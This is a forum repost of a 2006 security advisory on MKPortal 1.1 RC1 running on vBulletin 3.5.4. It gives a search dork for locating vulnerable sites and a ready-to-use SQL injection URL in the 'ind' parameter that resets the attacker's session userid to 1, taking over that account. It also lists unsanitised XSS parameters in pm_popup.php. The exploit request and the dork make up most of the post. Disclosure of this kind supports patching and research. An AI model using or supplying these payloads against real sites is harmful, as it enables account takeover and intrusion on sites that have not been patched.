Jump to content
Gonzalez

MKPortal <= 1.1 RC1 with vBulletin <= 3.5.4

Recommended Posts

Posted

Dorks: "MKPortal 1.1 RC1"

Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: [mail]nukedx@nukedx.com[/mail] web: [url]http://www.nukedx.com
This[/url] exploit works on MKPortal <= 1.1 RC1 with vBulletin <= 3.5.4
[url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1
With this example you can change your session's userid to 1.
Original advisory: [url]http://www.nukedx.com/?viewdoc=26[/url]

# nukedx.com [2006-04-21]

--Security Report--
Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:36 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx at nukedx.com
Web: [url]http://www.nukedx.com[/url]
}
---
Vendor: MKPortal ([url]http://www.mkportal.it/[/url])
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via this methods remote attacker can inject arbitrary SQL queries to
ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file
mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it
easy to
by pass this SQL update function.
Also there is cross-site scripting vulnerability in pm_popup.php the
parameters u1,m1,m2,m3,m4 did not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection :

GET -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1
So with this example remote attacker updates his session's userid to 1 and
after refreshing the page he can logs as userid 1.

XSS:
GET ->

[url]http://[victim]/[/url][mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...